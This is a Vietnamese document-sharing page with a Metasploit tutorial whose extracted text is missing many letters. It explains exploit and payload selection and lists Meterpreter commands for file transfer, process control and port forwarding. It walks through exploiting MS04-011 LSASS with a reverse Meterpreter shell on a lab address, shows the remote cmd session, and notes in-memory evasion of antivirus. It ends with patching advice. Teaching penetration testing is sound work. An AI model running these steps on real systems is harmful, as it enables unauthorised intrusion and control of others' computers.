intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Metasploit - Công cụ khai thác lỗ hổng

Chia sẻ: Hoang Thuy | Ngày: | Loại File: PDF | Số trang:5

473
lượt xem
108
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Metasploit Framework là một môi trường dùng để kiểm tra ,tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Bạn có thể download chương trình tại www.metasploit.com

Chủ đề:
Lưu

Nội dung Text: Metasploit - Công cụ khai thác lỗ hổng

  1. Metasploit - Công c khai thác l h ng METASPLOIT 1) Gi i thi u Metasploit Framework là m t môi trư ng dùng ki m tra ,t n công và khai thác l i c a các service. Metasploit ư c xây d ng t ngôn ng hư ng i tư ng Perl, v i nh ng components ư c vi t b ng C, assembler, và Python.Metasploit có th ch y trên h u h t các h i u hành: Linux, Windows, MacOS. B n có th download chương trình t i www.metasploit.com Metasploit có th t ng update b t u t version 2.2 tr i, s d ng script msfupdate.bat trong thư m c cài t 2)Các thành ph n c a Metasploit Metasploit h tr nhi u giao di n v i ngư i dùng: -console interface: dùng msfconsole.bat. Msfconsole interface s d ng các dòng l nh c u hình, ki m tra nên nhanh hơn và m m d o hơn -Web interface: dùng msfweb.bat, giao ti p v i ngư i dùng thông qua giao di n web -Command line interface: dùng msfcli.bat Enviroment Global Enviroment: ư c th c thi thông qua 2 câu l nh setg và unsetg, nh ng options ư c gán ây s mang tính toàn c c, ư c ưa vào t t c các module exploits Temporary Enviroment: ư c th c thi thông qua 2 câu l nh set và unset, enviroment này ch ư c ưa vào module exploit ang load hi n t i, không nh hư ng n các module exploit khác B n có th lưu l i enviroment mình ã c u hình thông qua l nh save. Môi trư ng ó s ư c lưu trong /.msf/config và s ư c load tr l i khi user interface ư c th c hi n Nh ng options nào mà chung gi a các exploits module như là: LPORT, LHOST, PAYLOAD thì b n nên ư c xác nh Global Enviroment vd: msf> setg LPORT 80 msf> setg LHOST 172.16.8.2 3)S d ng Metasploit framework 1. Ch n module exploit: l a ch n chương trình, d ch v l i mà Metasploit có h tr khai thác show exploits: xem các module exploit mà framework có h tr use exploit_name: ch n module exploit info exploit_name: xem thông tin v module exploit B n nên c p nh t thư ng xuyên các l i d ch v trên www.metasploit.com ho c qua script msfupdate.bat 2. C u hình module exploit ã ch n
  2. show options: Xác nh nh ng options nào c n c u hình set : c u hình cho nh ng option c a module ó M t vài module còn có nh ng advanced options, b n có th xem b ng cách gõ dòng l nh show advanceds 3. Verify nh ng options v a c u hình: check: ki m tra xem nh ng option ã ư c set chính xác chưa. 4. L a ch n target: l a ch n h di u hành nào th c hi n show targets: nh ng target ư c cung c p b i module ó set: xác nh target nào vd: smf> use windows_ssl_pct show targets exploit s li t kê ra nh ng target như: winxp, winxp SP1, win2000, win2000 SP1 5. L a ch n payload payload là o n code mà s ch y trên h th ng remote machine show payloads: li t kê ra nh ng payload c a module exploit hi n t i info payload_name: xem thông tin chi ti t v payload ó set PAYLOAD payload_name: xác nh payload module name.Sau khi l a ch n payload nào, dùng l nh show options xem nh ng options c a payload ó show advanced: xem nh ng advanced options c a payload ó 6.Th c thi exploit exploit: l nh dùng th c thi payload code. Payload sau ó s cung c p cho b n nh ng thông tin v h th ng ư c khai thác 4.Gi i thi u payload meterpreter Meterpreter, vi t t t t Meta-Interpreter là m t advanced payload có trong Metasploit framework. Muc ích c a nó là cung c p nh ng t p l nh khai thác, t n câng các máy remote computers. Nó ư c vi t t các developers dư i d ng shared object( DLL) files. Meterpreter và các thành ph n m r ng ư c th c thi trong b nh , hoàn toàn không ư c ghi lên ĩa nên có th tránh ư c s phát hi n t các ph n m m ch ng virus Meterpreter cung c p m t t p l nh chúng ta có th khai thác trên các remote computers Fs: cho phép upload và download files t các remote machine Net: cho phép xem thông tin m ng c a remote machine như IP, route table Process:cho phép t o các processes m i trên remote machine Sys: cho phép xem thông tin h th ng c a remote machine S d ng câu l nh use -m module1,module2,module3 [ -p path ] [ -d ] Câu l nh use dùng load nh ng module m r ng c a meterpreter như: Fs, Net,
  3. Process.. loadlib -f library [ -t target ] [ -lde ] Câu l nh cho phép load các thư vi n c a remote machines read channel_id [length] L nh read cho phép xem d liêu c a remote machine trên channel ang k t n i write channel_id L nh write cho phép ghi d li u lên remote machine close channel_id óng channel mà ã k t n i v i remote computer interact channel_id B t u m t phiên làm vi c v i channel v a thi t l p v i remote machine initcrypt cipher [parameters] Mã hoá d li u ư c g i gi a host và remote machine S d ng module Fs: cho phép upload và download files t các remote machine cd directory gi ng l nh cd c a commandline getcwd cho bi t thư m c ang làm vi c hi n t i ls [filter_string] li t kê các thư m c và t p tin upload src1 [src2 ...] dst upload file download src1 [src2 ...] dst download file S d ng module Net: ipconfig route xem b ng nh tuy n c a remote machine portfwd [ -arv ] [ -L laddr ] [ -l lport ] [ -h rhost ] [ -p rport ] [ -P ] cho phép t o port forward gi a host và remote machine S d ng module Process: execute -f file [ -a args ] [ -Hc ] câu l nh execute cho phép b n t o ra m t process m i trên remote machine và s d ng process ó khai thác d li u kill pid1 pid2 pid3
  4. hu nh ng processes ang ch y trên máy remote machine ps li t kê nh ng process c a remote machine S d ng module Sys: getuid cho bi t username hi n t i c a remote machine sysinfo cho bi t thông tin v computername, OS 5)Ví d : Máy localhost có a ch 192.168.1.1 s t n công máy remote có a ch 192.168.1.2 thông qua l i Lsass_ms04_011. ây là l i tràn stack trong d ch v LSA( Local Security Authority).Lsass.exe là m t process c a h th ng Microsoft Windows, ch u trách nhi m v ch ng th c local security, qu n lý Active Directory và các chính sách login. Lsass ki m sóat vi c ch ng th c c a c client và server. Msf>use Lsass_ms04_011 Msf>set PAYLOAD win32_reverse_meterpreter Msf>set RHOST 192.168.1.2 Msf>set LHOST 192.168.1.1 Msf>exploit Meterpreter> help Meterpreter>use -m Process //add thêm t p l nh c a process Meterpreter>help // xem các l nh meterpreter h tr Meterpreter>ps // list các process mà remote machine ang ch y Meterpreter>kill // t t các process mà remote machine ang ch y Meterpreter> execute -f cmd –c // t n công s d ng comandline cmd c a remote machine execute: success, process id is 3516. execute: allocated channel 1 for new process. meterpreter> interact 1 interact: Switching to interactive console on 1... interact: Started interactive channel 1. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS>echo Meterpreter interactive channel in action echo Meterpreter interactive channel in action Meterpreter interactive channel in action C:\WINDOWS>ipconfig
  5. Caught Ctrl-C, close interactive session? [y/N] y meterpreter> 6)Cách phòng ch ng Thư ng xuyên c p nh t các b n vá l i c a Microsofts. Ví d như Metasploit không th khai thác ư c l i Lsass_ms04_011, b n ph i c p nh t b n vá l i c a Microsoft. Theo Microsoft ánh giá, ây là m t l i nghiêm tr ng, có trên h u h t t t c các h i u hành windows. B n nên s d ng hotfix có number là 835732 vá l i trên.
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2